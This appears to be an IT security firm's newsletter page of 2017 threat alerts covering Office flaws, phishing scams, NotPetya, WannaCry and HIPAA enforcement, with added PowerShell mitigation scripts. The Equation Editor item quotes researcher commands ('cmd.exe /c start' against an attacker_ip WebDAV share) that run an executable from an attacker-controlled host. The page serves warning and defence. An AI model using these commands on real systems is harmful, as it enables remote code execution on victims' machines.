Sales: 585-624-7210 - Service: 585-582-1600

Skeleton in the closet: 17-year old MS office flaw allows malware install when user opens file

Here is a new pain in the neck! Fix this one ASAP.

While the world is still dealing with the threat of 'unpatched' Microsoft Office's built-in DDE feature, researchers have uncovered a serious issue with another Office component that could allow attackers to remotely install malware on targeted computers.

The vulnerability is a memory-corruption issue that resides in all versions of Microsoft Office released in the past 17 years, including Microsoft Office 365, and works against all versions of Windows operating system, including the latest Microsoft Windows 10 Creators Update.

Discovered by the security researchers at Embedi, the vulnerability leads to remote code execution, allowing an unauthenticated, remote attacker to execute malicious code on a targeted system without requiring any user interaction beyond opening a malicious document. Here is how it looks: when you see the calculator (CALC) pop up, it means the attacker was able to run any executable they wanted.

[Image: Skeleton_In_Closet-1.png, screenshot of the calculator launched by the malicious document]

The vulnerability, identified as CVE-2017-11882, resides in EQNEDT32.EXE, an MS Office component which is responsible for insertion and editing of equations (OLE objects) in documents.

However, due to improper memory operations, the component fails to properly handle objects in the memory, corrupting it in such a way that the attacker could execute malicious code in the context of the logged-in user.

Seventeen years ago, EQNEDT32.EXE was introduced in Microsoft Office 2000 and had been kept in all versions released after Microsoft Office 2007 in order to ensure the software remains compatible with documents of older versions.

Exploitation of this vulnerability requires opening a specially crafted malicious file with an affected version of Microsoft Office or Microsoft WordPad software.

This vulnerability could be exploited to take complete control over a system when combined with Windows Kernel privilege escalation exploits (like CVE-2017-11847).

Possible Attack Scenario:

While explaining the scope of the vulnerability, Embedi researchers suggested several attack scenarios listed below:

"By inserting several OLEs that exploited the described vulnerability, it was possible to execute an arbitrary sequence of commands (e.g., to download an arbitrary file from the Internet and execute it)."

"One of the easiest ways to execute arbitrary code is to launch an executable file from the WebDAV server controlled by an attacker."

"Nonetheless, an attacker can use the described vulnerability to execute the commands like cmd.exe /c start \\attacker_ip\ff. Such a command can be used as a part of an exploit and triggers starting WebClient."

"After that, an attacker can start an executable file from the WebDAV server by using the \\attacker_ip\ff\1.exe command. The starting mechanism of an executable file is similar to that of the \\live.sysinternals.com\tools service."

Protection Against Microsoft Office Vulnerability

With this month's Patch release, Microsoft has addressed this vulnerability by changing how the affected software handles objects in memory.

So, users are strongly recommended to apply the November security patches as soon as possible to keep hackers and cybercriminals from taking control of their computers.

Since this component has a number of security issues which can be easily exploited, disabling it could be the best way to ensure your system security.

Users can run the following command in the command prompt to disable the component's registration in the Windows registry:

reg add "HKLM\SOFTWARE\Microsoft\Office\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD /d 0x400

For 32-bit Microsoft Office package in x64 OS, run the following command:

reg add "HKLM\SOFTWARE\Wow6432Node\Microsoft\Office\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD /d 0x400
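As an added example (this script is not part of the original post and not a Microsoft tool), here is a PowerShell version of the same mitigation that first reports whether the kill bit is already present under both registry views and then applies it. It uses only the CLSID, key paths and the 0x400 value given above; the function names are this example's own. On a 64-bit OS it only touches the Wow6432Node path when running from a 64-bit PowerShell, because a 32-bit PowerShell would silently redirect HKLM:\SOFTWARE to Wow6432Node.

```powershell
# Added example, not code from the original post. Checks for and applies the
# Equation Editor "Compatibility Flags" kill bit (0x400) described in the post.
# Function names (Get-EquationEditorStatus, Disable-EquationEditor) are assumptions.

$Clsid   = '{0002CE02-0000-0000-C000-000000000046}'   # Equation Editor CLSID from the post
$KillBit = 0x400                                       # value the post specifies

# Native view applies on every OS; the Wow6432Node view only matters for 32-bit
# Office on a 64-bit OS, and only from a 64-bit process (no registry redirection).
$KeyPaths = @("HKLM:\SOFTWARE\Microsoft\Office\Common\COM Compatibility\$Clsid")
if ([Environment]::Is64BitOperatingSystem) {
    if ([Environment]::Is64BitProcess) {
        $KeyPaths += "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Office\Common\COM Compatibility\$Clsid"
    } else {
        Write-Warning 'Running as a 32-bit process on a 64-bit OS; re-run from 64-bit PowerShell to cover both views.'
    }
}

function Get-CompatibilityFlags([string]$Path) {
    # Returns the DWORD value or $null when the key or value is absent.
    if (-not (Test-Path $Path)) { return $null }
    $item = Get-ItemProperty -Path $Path -Name 'Compatibility Flags' -ErrorAction SilentlyContinue
    if ($null -eq $item) { return $null }
    return $item.'Compatibility Flags'
}

function Get-EquationEditorStatus {
    # One row per registry view: current flags and whether the kill bit is set.
    foreach ($path in $KeyPaths) {
        $flags = Get-CompatibilityFlags $path
        [pscustomobject]@{
            Key      = $path
            Flags    = if ($null -eq $flags) { 'not set' } else { '0x{0:X}' -f $flags }
            Disabled = ($null -ne $flags) -and (($flags -band $KillBit) -eq $KillBit)
        }
    }
}

function Disable-EquationEditor {
    # Requires an elevated prompt (HKLM). ORs the kill bit into any existing
    # flags rather than overwriting them, then re-reads to confirm.
    foreach ($path in $KeyPaths) {
        if (-not (Test-Path $path)) { New-Item -Path $path -Force | Out-Null }
        $current = Get-CompatibilityFlags $path
        $new = if ($null -eq $current) { $KillBit } else { $current -bor $KillBit }
        Set-ItemProperty -Path $path -Name 'Compatibility Flags' -Value $new -Type DWord
    }
    Get-EquationEditorStatus
}

# Audit only; uncomment the last line from an elevated prompt to apply the mitigation.
Get-EquationEditorStatus | Format-Table -AutoSize
# Disable-EquationEditor | Format-Table -AutoSize
```

The audit call is safe to run from a normal prompt and is handy for checking a fleet after rollout; the Disabled column should read True for every view before you consider the workaround in place. Note that this is a workaround, not a replacement for the November patch.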

Besides this, you should also enable Protected View (Microsoft Office sandbox) to prevent active content execution (OLE/ActiveX/Macro).

Consider formalized Phishing and security training for your organization.

https://www.skyport-it.com/phishing

“We don’t just manage data security. We fortify I.T.”

Safe Regards,
Dan

Wi-Fi KRACKED?

On October 16, 2017 the U.S. Department of Homeland Security announced the news of the KRACK (‘key reinstallation attack’) flaw in the protocol which was designed to secure all modern protected Wi-Fi networks.  

Unfortunately, that means that the technology used to secure and protect communications between routers, mobile devices and IoT devices may not provide the protection expected, and permits hackers within range of the Wi-Fi network to hijack connections, decrypt traffic and view communications on all Wi-Fi enabled devices.

The good news for our managed security service clients is that we automatically mitigated any potential for breaches in your data infrastructure and updated all your existing software with the needed patch immediately, making the transition transparent to you.

If you are not a SkyPort IT managed security services customer, we can still help! Please contact us immediately and we will schedule a review of your security risks and create a SkyPort Fortification Plan.

For your Free Risk Assessment and Fortification Plan, click here.

SkyPort IT Nominates National Alliance on Mental Illness (NAMI) for M&T Business Challenge

SkyPort IT nominated the National Alliance on Mental Illness (NAMI) in Rochester, for the Understanding What’s Important Business Challenge for a chance for NAMI to win up to $10,000.  M&T Bank is sponsoring the challenge to celebrate the good that businesses are doing in the community and to help support organizations we care about - like NAMI.  

NAMI Rochester is an independent affiliate of the National Alliance on Mental Illness and NAMI New York State. They are a grassroots, not-for-profit, volunteer-driven organization that has been in Monroe County for over 35 years. Mental illness affects 20% of Americans regardless of their age, race, religion, education or income. These devastating medical conditions can disrupt a person’s thinking, feeling, moods, ability to relate to others and daily functioning. We support the initiatives NAMI takes to improve mental health in our community, a challenge that is becoming more difficult every day.

As you know, SkyPort IT, Inc., provides managed IT security services to protect client’s data. What you may not know is that we often provide nonprofits with donated equipment, software and reduced rates for IT security and data protection services.

“SkyPort IT has been wonderful in supporting our requirements for protected healthcare information,” said Patricia Sine, executive director, National Alliance on Mental Illness (NAMI). “Although we have put in place the foundation for a secure infrastructure, NAMI could benefit from this award.”

Like the majority of our clients who are under regulatory requirements for data protection, NAMI has the requirement to become HIPAA/HITECH (protected healthcare information) compliant as they are adding services that will put them in the category of a “covered entity” that is regulated by the government to protect patient data. To help NAMI achieve compliance, we have donated security services and other equipment. New PCs will enhance staff efficiency, resulting in better performance and fewer ongoing issues due to their age. The award would also be used to get additional services to protect data, which would include encrypted email.

Five finalists will be selected in October and the public will have a chance to vote for their favorite starting November 2.  Should NAMI be selected as a finalist, we will make you aware in the event you would like to vote for them and increase their chance of winning $10,000.

Scam of the Week: Equifax Phishing

You already know that a whopping 143 million Equifax records were compromised. The difference with this one is that a big-three credit bureau like Equifax tracks so much personal and sometimes confidential information like social security numbers, full names, addresses, birth dates, and even drivers licenses and credit card numbers for some. It can be the difference between being able to buy a house or sometimes even get a job or not. This breach and the way they handled it, including the announcement, was what Brian Krebs rightfully called a dumpster fire.

The problem is that with this much personal information in the hands of the bad guys, highly targeted spear phishing attacks can be expected, and a variety of other related crime like full-on identity theft on a much larger scale. These records are first going to be sold on the dark web to organized crime for premium prices, for immediate exploitation, sometimes by local gangs on the street. Shame on Equifax for this epic fail. They will be sued for billions of dollars for this web-app vulnerability.

So this Scam of the Week covers what is inevitable in the near future. We have not seen actual Equifax phishing attacks at this point yet, but you can expect them in the coming days and weeks because the bad guys are going to take their most efficient way to leverage this data... email.

I suggest you send the following to your employees, friends, and family. You're welcome to copy, paste, and/or edit:

"Cyber criminals have stolen 143 million credit records in the recent hacking scandal at big-three credit bureau Equifax. At this point you have to assume that the bad guys have highly personal information that they can use to trick you.

You need to watch out for the following things:

- Phishing emails that claim to be from Equifax where you can check if your data was compromised
- Phishing emails that claim there is a problem with a credit card, your credit record, or other personal financial information
- Calls from scammers that claim they are from your bank or credit union
- Fraudulent charges on any credit card because your identity was stolen

Here are 5 things you can do to prevent identity theft:

1. First sign up for credit monitoring (there are many companies providing that service including Equifax but we cannot recommend that)
2. Next freeze your credit files at the three major credit bureaus Equifax, Experian and TransUnion. Remember that generally it is not possible to sign up for credit monitoring services after a freeze is in place. Advice for how to file a freeze is available here on a state-by-state basis: http://consumersunion.org/research/security-freeze/
3. Check your credit reports via the free annualcreditreport.com
4. Check your bank and credit card statements for any unauthorized activity
5. If you believe you may have been the victim of identity theft, here is a site where you can learn more about how to protect yourself: www.idtheftcenter.org. You can also call the center’s toll-free number (888-400-5530) for advice on how to resolve identity-theft issues. All of the center’s services are free.

And as always, Think Before You Click!"

It's only early days in this hack; there will be a lot more information coming out in the days ahead. We will keep you updated when more news is available.

[ALERT] The IRS Issued An Urgent Warning Against An IRS / FBI-Themed Ransomware Phishing Attack

WASHINGTON, August 28, 2017 — The Internal Revenue Service warned people to avoid a new phishing scheme that impersonates the IRS and the FBI as part of a ransomware scam to take computer data hostage.

The IRS said: "The scam email uses the emblems of both the IRS and the Federal Bureau of Investigation. It tries to entice users to select a “here” link to download a fake FBI questionnaire. Instead, the link downloads a certain type of malware called ransomware that prevents users from accessing data stored on their device unless they pay money to the scammers."

“This is a new twist on an old scheme,” said IRS Commissioner John Koskinen. “People should stay vigilant against email scams that try to impersonate the IRS and other agencies that try to lure you into clicking a link or opening an attachment. People with a tax issue won’t get their first contact from the IRS with a threatening email or phone call."

I suggest you send employees, friends and family an email about this ransomware attack; you're welcome to copy/paste/edit:

"Heads-up! The IRS is warning against a new phishing scam that tries to make you download an FBI questionnaire. But if you click the link, your computer will be infected with ransomware instead. The scam email uses the emblems of both the IRS and the Federal Bureau of Investigation. Remember that the IRS does not use email, text messages or social media to discuss personal tax issues, such as those involving bills or refunds. THINK BEFORE YOU CLICK!"

The IRS stated: "Victims should not pay a ransom. Paying it further encourages the criminals, and frequently the scammers won’t provide the decryption key even after a ransom is paid. Victims should immediately report any ransomware attempt or attack to the FBI at the Internet Crime Complaint Center, www.IC3.gov. Forward any IRS-themed scams to phishing@irs.gov."

Here is the official IRS Newsroom post: https://www.irs.gov/uac/newsroom/irs-issues-urgent-warning-to-beware-irs-fbi-themed-ransomware-scam

EXECUTIVE BRIEF: WHY ADVANCED THREATS DEMAND ADVANCED EMAIL SECURITY

Email usage continues to increase

Regardless of the proliferation of text and social media, email communication is still growing strong. According to a recent study by the Radicati Group, the total volume of worldwide emails sent and received reached 205 billion per day, with this volume projected to increase by at least 5% every year. And this fact is not lost upon hackers, who are constantly seeking opportunities to exploit organizations. (The Radicati Group, Inc., Email Statistics Report, 2015-2019)

Anatomy of an email attack:

• A CFO gets an email from the CEO authorizing an emergency fund transfer. But the email is actually from a cybercriminal.
• An employee with administrative rights to key systems receives an urgent email from IT to update their network password. They actually disclose their password to cybercriminals.
• An employee receives an email to read an important attachment about their benefits provider. When they open the attachment, they unknowingly activate hidden Trojan malware.

E-mail threats organizations face today

Emails offer hackers a vehicle to deliver a variety of vulnerabilities to an organization. Some of the more common email-borne threats include:

Malware – email is one of the top delivery mechanisms to distribute known and unknown malware, which is typically embedded into email attachments in the hope that the attachment will be opened or downloaded onto a computer or network, thereby allowing hackers to gain access to resources, steal data, or crash systems.

Ransomware – one particularly nefarious malware variant is ransomware. Once the email attachment is activated, the code embeds itself on a network and ransomware typically encrypts or locks critical files and systems. The hackers then coerce the organization to pay an extortion fee in order to have the files or systems un-encrypted or unlocked.

Phishing – this common hacker tactic utilizes emails with embedded links to hacker sites. When gullible users visit these sites, they’re prompted to enter PII (Personally Identifiable Information) that is in turn used to steal identities, compromise corporate data, or access other critical systems.

Spear Phishing / Whaling – in this variant of phishing, key IT/networking individuals or company execs are targeted using malware-laced emails appearing to come from a trusted source, in efforts to gain access to internal systems and data.

Business Email Compromise / CEO Fraud / Impostor email – over the past two years, Business Email Compromise (BEC) schemes have caused at least $3.1 billion in total losses to approximately 22,000 enterprises around the world, according to the latest figures from the FBI (www.ic3.gov/media/2016/160614.aspx). The FBI defines Business Email Compromise as a sophisticated email scam that targets businesses working with foreign partners that regularly perform wire transfer payments.

Spam – emails are used to deliver spam or unsolicited messages, which can clog inboxes and network resources, diminish business productivity, and increase operational costs.

Outbound Email Hijacking – corporations are also subject to corporate policies and government regulations, which hold businesses accountable for their outgoing emails and for ensuring they protect their customers’ PII. Zombie attacks and IP hijacking can disseminate customer PII, ruining the reputation of a business.

Conclusion

Email communications are essential to organizations today, something hackers are keenly aware of. Given today’s complex, mature threats, it is paramount that organizations deploy a multi-layered security solution that includes dedicated, leading-edge email protection. To effectively combat today’s emerging threats, organizations are well-advised to implement a next-generation email security management solution that provides fundamental email protection. To learn more about ways to protect your organization’s emails, see: What your next-gen multi-layered security needs to stop advanced threats.

About SkyPort IT, Inc

SkyPort IT promises a relentless focus on data security and regulatory compliance so our clients can focus on their business, by using best practices and best-in-class technology to proactively design, deploy, and protect clients’ IT infrastructure and data. Why Managed Security Services? Visit www.skyport-it.com for the answer, or for a free consult call us at 585-582-1600 or email SecureMe@skyport-it.com

In today’s hyper-connected world, email-based communications are not just commonplace – they have become a fundamental cornerstone for effectively conducting business, with the total volume of worldwide emails sent per day projected to increase by at least 5% every year. Given the ubiquitous nature of email communications, emails are and will continue to be a popular vector for a variety of threats.

NotPetya Is a Cyber Weapon, Not Ransomware

Yesterday morning, after monitoring this new outbreak for 24 hours, I came to the conclusion we were dealing with cyber warfare, and not ransomware. Two separate reports coming from Comae Technologies and Kaspersky Lab experts confirm this now.

NotPetya is a destructive disk wiper similar to Shamoon, which has been targeting Saudi Arabia in the recent past. Note that Shamoon actually deleted files; NotPetya goes about it slightly differently: it does not delete any data but simply makes it unusable by locking the files and then throwing away the key. The end result is the same.

Someone is hijacking known ransomware families and using them to attack Ukrainian computer systems. Guess who.

You never had a chance to recover your files. There are several technical indicators that NotPetya was only made to look like ransomware as a smoke screen:

- It never bothers to generate a valid infection ID
- The Master File Table gets overwritten and is not recoverable
- The author of the original Petya also made it clear NotPetya was not his work

This has actually happened earlier. Foreshadowing the NotPetya attack, the author of the AES-NI ransomware said in May he did not create the XData ransomware, which was also used in targeted attacks against Ukraine. Furthermore, both XData and NotPetya used the same distribution vector, the update servers of a Ukrainian accounting software maker.

Catalin Cimpanu, the Security News Editor for Bleepingcomputer, stated: "The consensus on NotPetya has shifted dramatically in the past 24 hours, and nobody would be wrong to say that NotPetya is on the same level with Stuxnet and BlackEnergy, two malware families used for political purposes and for their destructive effects. Evidence is clearly mounting that NotPetya is a cyber-weapon and not just some overly-aggressive ransomware."

Cybersecurity has moved from Tech to a CEO and Board-level business issue

You did not sign up for this, but today it is abundantly clear that as an IT pro you have just found yourself on the front line of 21st-century cyber war. Cybersecurity has moved from Tech to a CEO and Board-level business issue.

I strongly suggest you have another look at your defense-in-depth, and make sure to:

- Have weapons-grade backups
- Religiously patch
- Step users through new-school security awareness training

I would be happy to visit and explain our Managed Security Services multi-layered protection schema to current and prospective customers.

Think before you click!

Safe Regards,
Dan

Scam of the Week: Massive DocuSign Phishing Attacks

DocuSign has admitted they were the victim of a data breach that has led to massive phishing attacks which used exfiltrated DocuSign information. Ouch. So here is your Scam of the Week.

They discovered the data breach when, on May 9, 15, and 17, DocuSign customers were being targeted with phishing campaigns. They are now advising customers to filter or delete any emails with specific subject lines. We do not repeat them here, because this newsletter might be filtered out, but you can see them at the blog, together with screenshots:
https://blog.knowbe4.com/scam-of-the-week-docusign-phishing-attacks

The campaigns all have Word docs as attachments, and use social engineering to trick users into activating Word's macro feature which will download and install malware on the user's workstation. DocuSign warned that it is highly likely there will be more campaigns in the future.

I suggest you send the following to your employees. You're welcome to copy, paste, and/or edit:

"Hackers have stolen the customer email database of DocuSign, the company that allows companies to electronically sign documents. These criminals are now sending phishing emails that look exactly like the real DocuSign ones, but they try to trick you into opening an attached Word file and click to enable editing.

But if you do that, malware may be installed on your workstation. So if you get emails that look like they come from DocuSign and have an attachment, be very careful. If there is any doubt, pick up the phone and verify before you electronically sign any DocuSign email. Remember: Think Before You Click."

Safe Regards,
Dan

Latest Wannacry Ransomware Information

Hi Folks,

Just watched https://www.sans.org/webcasts/latest-wannacry-ransomware-105150.

If you’ve not been keeping up with the Wannacry ransomware, it’s probably worth an hour to view it.  The insight on how people were tracking it down and reacting to it could be useful.

I’d give it a 4/5 on topic/interest/content depending on how much you’ve already learned about wannacry.

Safe Regards,
Dan

[URGENT ALERT] Defend Against This Ransomware WMD NOW

This is not a drill, or a phishing test.

Yet unknown cyber criminals have taken an NSA 0-day threat and weaponized a ransomware strain so that it replicates like a worm and takes over the whole network. 

This is the biggest ransomware outbreak in history. There is an MS patch that needs to be applied urgently if you have not done that already.

I suggest you immediately look into this and patch your systems before your users come back to work on Monday. Here is a blog post with all the updated detail:

https://blog.knowbe4.com/ransomware-attack-uses-nsa-0-day-exploits-to-go-on-worldwide-rampage

Yes, if you hover, this link is redirected, but you can cut&paste the link to our blog if you are paranoid. (which you should be!)

This is a bad one. Let's stay safe out there. 

Safe Regards,

Dan

New York is the first state to enforce cybersecurity regulations specific to financial companies. The regulation makes it clear that cybersecurity is not solely a technology or information security team matter. It comprises an enterprise-level approach to managing cyber risk by expressly imposing responsibility for the cybersecurity program on senior management and requiring not only technical controls, but operational controls, policies and procedures, training programs and reporting to senior management and the board.

Many pieces of this regulation are expected to be adopted by the end of this summer.

Here is a great article on this topic.

http://ahearnelaw.com/revised-newyork-cybersecurity-rules-for-financial-companies-start-march-1-2017/

From NYS DFS: http://www.dfs.ny.gov/legal/regulations/adoptions/dfsrf500txt.pdf

Also check with your associations to see if they have developed templates for your industry for policies and procedures.

As part of our managed services we help in the development of proper policies and procedures. This is the first step in compliance. However, few organizations have proper ones in place. Our years of experience in HIPAA and PCI-DSS make this a no-brainer. It is like running a business without a business plan, bad things can happen.

Safe Regards,
Dan

P.S. – You may find (and request) useful information here on our site: https://www.skyport-it.com/useful-materials-just-for-you

Hey: Don’t Click That Weird Google Docs Link You Just Got (and Tell Your Mom Not to Click, Either)

A very convincing Google Docs phishing scheme is racing around the internet right now, which means you should avoid clicking any weird Google Docs that have been emailed to you recently — even if it’s from someone you know. It’s spreading incredibly quickly:

Safe Regards,
Dan

VMware Releases Security Advisories for Various Critical Vulnerabilities in vCenter, Workstation, and more

Description: VMware has released two security advisories addressing eight vulnerabilities across vCenter Server, Unified Access Gateway, Horizon View, and Workstation. The first advisory details CVE-2017-5641, a remote code execution flaw in vCenter Server manifesting via BlazeDS. The second advisory addresses a vulnerability in Unified Access Gateway and Horizon View that could allow an attacker to execute code on the security gateway. The second advisory also addresses various flaws in Cortado ThinPrint that could allow a guest to execute code or perform a denial of service attack on the host operating system. VMware has released software updates that address these vulnerabilities.

Reference:
- http://www.vmware.com/security/advisories/VMSA-2017-0007.html
- http://www.vmware.com/security/advisories/VMSA-2017-0008.html

Snort SID: Detection pending release of vulnerability information

Overlooking risks leads to breach, $400,000 settlement

The U.S. Department of Health and Human Services, Office for Civil Rights (OCR), has announced a Health Insurance Portability and Accountability Act of 1996 (HIPAA) settlement based on the lack of a security management process to safeguard electronic protected health information (ePHI). Metro Community Provider Network (MCPN), a federally-qualified health center (FQHC), has agreed to settle potential noncompliance with the HIPAA Privacy and Security Rules by paying $400,000 and implementing a corrective action plan. With this settlement amount, OCR considered MCPN’s status as an FQHC when balancing the significance of the violation with MCPN’s ability to maintain sufficient financial standing to ensure the provision of ongoing patient care. MCPN provides primary medical care, dental care, pharmacies, social work, and behavioral health care services throughout the greater Denver, Colorado metropolitan area to approximately 43,000 patients per year, a large majority of whom have incomes at or below the poverty level.

On January 27, 2012, MCPN filed a breach report with OCR indicating that a hacker accessed employees' email accounts and obtained 3,200 individuals' ePHI through a phishing incident. OCR’s investigation revealed that MCPN took necessary corrective action related to the phishing incident; however, the investigation also revealed that MCPN failed to conduct a risk analysis until mid-February 2012. Prior to the breach incident, MCPN had not conducted a risk analysis to assess the risks and vulnerabilities in its ePHI environment, and, consequently, had not implemented any corresponding risk management plans to address the risks and vulnerabilities identified in a risk analysis. When MCPN finally conducted a risk analysis, that risk analysis, as well as all subsequent risk analyses, were insufficient to meet the requirements of the Security Rule.

“Patients seeking health care trust that their providers will safeguard and protect their health information,” said OCR Director Roger Severino. “Compliance with the HIPAA Security Rule helps covered entities meet this important obligation to their patient communities.”

The Resolution Agreement and Corrective Action Plan may be found on the OCR website at http://www.hhs.gov/hipaa/for-professionals/compliance-enforcement/agreements/MCPN

OCR’s guidance on the Security Rule may be found at https://www.hhs.gov/hipaa/for-professionals/security/guidance/index.html

To learn more about non-discrimination and health information privacy laws, your civil rights, and privacy rights in health care and human service settings, and to find information on filing a complaint, visit us at http://www.hhs.gov/hipaa/index.html

[ALERT] You Want To Fix This MS-Word 0-day Threat Today

Monday night, researchers at Proofpoint sounded the alarm about a critical 0-day threat known as CVE-2017-0199 in Microsoft Word that allowed booby-trapped Dridex phishing attacks to be sent to millions of employees, claiming to be a PDF sent to them by their company photocopier.

This one is particularly bad because it bypasses exploit mitigations built into Windows, doesn't require your employee to enable macros, works even against Windows 10, which is Redmond's most secure OS yet, and this exploit works on most or all Windows versions of Word. Ouch!

Campaign Uses Spoofed Email Domains

Dridex used to rely on macro-infected documents attached to emails and use social engineering to trick the user into opening the attachment and clicking the macro button. This time around they were pretty nimble and leveraged a zero-day in Word. Proofpoint's technical analysis said:

"Emails in this campaign used an attached Microsoft Word RTF (Rich Text Format) document. Messages purported to be from "". [device] may be "copier", "documents", "noreply", "no-reply", or "scanner". The subject line in all cases read "Scan Data" and included attachments named "Scan_123456.doc" or "Scan_123456.pdf", where "123456" was replaced with random digits. Note that while this campaign does not rely on sophisticated social engineering, the spoofed email domains and common practice of emailing digitized versions of documents make the lures fairly convincing."

What To Do About It?

1) Patch. Fortunately, on Tuesday Microsoft released its regular batch of security patches - including a fix for this nasty Office zero-day vulnerability CVE-2017-0199. Turns out that this wasn't the only thing that needed patching. An elevation of privilege vulnerability in Internet Explorer (CVE-2017-0210) that would allow an attacker to convince a user to visit a compromised website was also fixed.

2) If you cannot patch. Here is a quick and dirty fix to prevent this exploit from working by adding the following to your Windows registry: set Software\Microsoft\Office\15.0\Word\Security\FileBlock\RtfFiles to 2 and OpenInProtectedView to 0.

3) Find out if your domain can be spoofed. Did you know that one of the first things hackers try is to see if they can spoof the email address of someone in your own domain? Then they can launch a spear phishing attack on your organization.

If you are a managed services customer we are already helping you. If not, go here to see why managed services makes sense: https://www.skyport-it.com/managed-services/

Safe Regards,
Dan
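As an added example that is not part of the original post, here is a PowerShell form of the registry workaround from step 2 above, written to apply the two values and then read them back so the change can be verified before you rely on it. Two things are assumptions not stated in the post: the values live under the current user's hive (HKCU), and "15.0" in the path is the Office 2013 version number, so it is exposed as a parameter for other Office versions.

```powershell
# Added example (not from the original post): applies and verifies the
# FileBlock workaround for CVE-2017-0199 on one user's Word profile.
# Assumptions: the key is under HKCU, and "15.0" is the Office 2013 version
# number; other Office versions use a different number (hence the parameter).
param(
    [string]$OfficeVersion = '15.0'   # assumption: adjust for your Office version
)

$key = "HKCU:\Software\Microsoft\Office\$OfficeVersion\Word\Security\FileBlock"

# The FileBlock key is absent by default, so create it if needed.
if (-not (Test-Path $key)) {
    New-Item -Path $key -Force | Out-Null
}

# RtfFiles = 2 blocks RTF documents from being opened in Word, which is the
# file type the campaign described above used to carry the exploit.
New-ItemProperty -Path $key -Name 'RtfFiles' -PropertyType DWord -Value 2 -Force | Out-Null

# OpenInProtectedView = 0 tells Word not to fall back to opening blocked
# files in Protected View, so a blocked RTF is not parsed at all.
New-ItemProperty -Path $key -Name 'OpenInProtectedView' -PropertyType DWord -Value 0 -Force | Out-Null

# Read the values back so the result can be checked (and logged) after applying.
$applied = Get-ItemProperty -Path $key
[pscustomobject]@{
    Key                 = $key
    RtfFiles            = $applied.RtfFiles
    OpenInProtectedView = $applied.OpenInProtectedView
}
```

Because this blocks every RTF document, not just malicious ones, legitimate RTF attachments will stop opening for that user until the values are removed; treat it as a stopgap until the patch from step 1 is installed, and remember that it is per-user, so each profile on a shared machine needs it applied.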

Five-year prediction: cloud vs. data center

Analysts, tech bloggers and IT managers have been debating the net value of using data centers vs. the public cloud for years now. We’ve seen opinions around business advantages and disadvantages for both, but which will ultimately win the cost war in the future? We went straight to the front lines of IT for answers.

We sat down with Samuel Alt, technical support specialist at Ingram Micro, to get his future forecast. He has extensive, real-world experience with both data centers and the cloud, and his five-year prediction may surprise you.

Everyone's talking about the cloud overtaking data centers. What's your opinion?

The short-term play for many companies is cloud, due to low upfront costs and instant scalability, but I question its long-term sustainability due to cost. As for the landscape five years from now, I actually see a shift back to an energy-efficient, powerful, shrunken form of data centers.

What will hurt the cloud play in the future?

Cost will eventually kill cloud momentum. The cloud appears cost-effective at first, but gets expensive quickly as you scale. Some organizations must store thousands of terabytes—that’s going to be a pain point as the world consumes more data. Cloud bandwidth is expensive. Cloud SQL storage is expensive.

There’s also a lack of control and flexibility in the cloud. I like to see, touch, migrate and own my data. Depending on what you’re using it for, it may be difficult and time-consuming to pull down your data when you want it.

Also, there’s always a bit of paranoia when it comes to someone else hosting your data. You have no idea whether it’s physically residing in Texas, Ohio, China—it could be sitting anywhere.

Why do you think data centers will make a comeback in five years?

I’ll start with my mobile phone analogy—the early consumer wireless phones were huge bricks. Then, they trended toward slimmer models with small screens. Today, they’re massive again, in the form of phablets with big screens, because that’s what consumers wanted all along. Since companies have never stopped wanting control over their data, I think we’ll see a similar return to on-premise data centers, just in a superior, resurrected form.

What will data centers look like in the future?

Smaller, extremely energy-efficient and more powerful. Imagine what people love about the cloud, but in a controllable, on-premise environment. That’s the future of data centers. The ideal scenario is total control over your data, but at a significantly lower cost and without taking up much physical real estate.

What else needs to happen in order to see a shift back to data centers?

Power efficiency is critical. One component that measures this is power usage effectiveness (PUE), which calculates the ratio of total amount of energy used by a data center facility to the energy delivered to computing equipment.

Currently, powering up a data center is expensive, but it won’t always be. Energy-efficient data centers will produce dramatic savings when it comes to power, heating and cooling costs.

What's the tipping point?

The cost of hardware (cooling infrastructure, firewalls, tape drives, etc.) will decrease and the cost of using the cloud will increase. IT managers will balk at the annual cloud spend. Again, pricing will catch up to the cloud as we consume more data.

Going forward, I think that cloud will have a great place in the SMB and small data center market. However, any mid- to large-scale data center will not be willing to change due to a cost perspective.

Can you speak more to the physical size of future data centers?

Data centers will shrink with virtualization. The days of massive racks filled with networking equipment will go away. (Think old IBM mainframes that took up half a building.) Space is money. Real estate is a key reason why companies go to the cloud—with virtualization, that won’t be a factor. Consider how hyperconvergence integrates storage, networking and virtualization all in one box.

In five years, you could run an enterprise from a small closet. In 10 years, from your pocket.

NOTABLE RECENT SECURITY ISSUES

Title: Cisco Releases Critical Security Advisory For IOS and IOS XE 0-day Found in "Vault 7" Info Dump

Description: Cisco has released a critical security advisory in response to CVE-2017-3881, a 0-day vulnerability that was identified in the "Vault 7" information dump. CVE-2017-3881 is a remote code execution vulnerability that manifests in the Cisco Cluster Management Protocol (CMP) processing functionality of IOS and IOS XE. A remote, unauthenticated attacker who transmits malformed CMP-specific Telnet options to a vulnerable device could exploit this flaw and execute arbitrary code with elevated privileges. Note that the vulnerable device must be configured to accept Telnet connections. Cisco is currently developing software updates that will address this vulnerability.

Reference: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170317-cmp

Snort SID: 41909-41910

A Single Spear Phishing Click Caused the Yahoo Data Breach

A single click was all it took to launch one of the biggest data breaches ever.

One mistaken click. That's all it took for a Canadian hacker aligned with rogue Russian FSB spies to gain access to Yahoo's network and potentially the email messages and private information of as many as 1.5 billion people.

The U.S. Federal Bureau of Investigation has been investigating the intrusion for two years, but it was only in late 2016 that the full scale of the hack became apparent. On Wednesday, the FBI indicted four people for the attack, two of whom are rogue FSB spies who work for the division that is supposed to cooperate with America’s FBI on cybercrime investigations. (The FSB is the successor of the KGB.)

Kremlin Intelligence Services Overlap With Russian Cybercrime Underworld

One of these two rogues, Dmitry Dokuchaev, was himself recently arrested on what the Moscow press calls “treason” charges for passing information to the CIA. In reality, Dokuchaev started out as a criminal hacker who moved to the FSB but never stopped his old tricks. He was just one of the many criminals working inside Russia’s intelligence bureaucracy, and for personal profit he sold information to intermediaries that ultimately found its way to the CIA. The investigation exposed rivalries inside the Kremlin intelligence establishment as well as inside the Russian cybercrime underworld with which it overlaps. Dokuchaev was part of Shaltai-Boltai, a hacker group that exploits stolen data to embarrass and blackmail Russian politicians and business officials.

